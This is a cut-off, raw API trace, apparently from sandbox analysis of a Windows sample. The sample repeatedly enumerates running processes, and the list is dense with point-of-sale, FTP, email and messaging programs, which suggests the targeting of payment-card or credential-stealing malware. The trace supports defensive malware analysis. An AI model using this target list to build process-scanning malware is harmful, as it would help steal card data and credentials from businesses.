hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0109.932] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0109.933] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0109.935] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0109.937] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0109.939] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0109.942] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0109.944] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0109.946] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0109.948] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x106c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0109.951] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0109.955] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0109.958] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0109.960] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0109.962] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0109.964] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0109.966] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0109.969] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0109.971] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0109.973] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0109.976] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0109.978] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0109.980] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0109.982] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0109.984] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0109.986] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0109.989] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0109.991] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0109.993] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0109.995] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0109.997] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0109.999] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0110.003] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0110.005] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0110.007] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0110.009] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0110.011] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0110.013] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0110.015] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1228, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0110.017] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0110.019] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0110.021] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0110.023] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0110.025] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0110.027] Process32Next (in: hSnapshot=0x2164, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0110.028] CloseHandle (hObject=0x2164) returned 1 [0110.029] Sleep (dwMilliseconds=0x64) [0110.174] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0110.186] Process32First (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.189] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x82, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0110.191] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0110.192] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.194] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0110.195] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0110.197] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0110.199] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0110.201] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0110.203] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.204] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.206] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0110.208] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.267] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.269] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.271] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.273] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.275] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.277] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.279] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.281] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0110.283] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.285] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0110.286] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x64c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.288] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.290] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0110.291] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0110.293] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0110.294] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0110.297] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.299] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0110.300] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.302] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0110.304] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0110.306] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.308] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0110.310] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0110.311] Process32Next (in: hSnapshot=0x215c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, 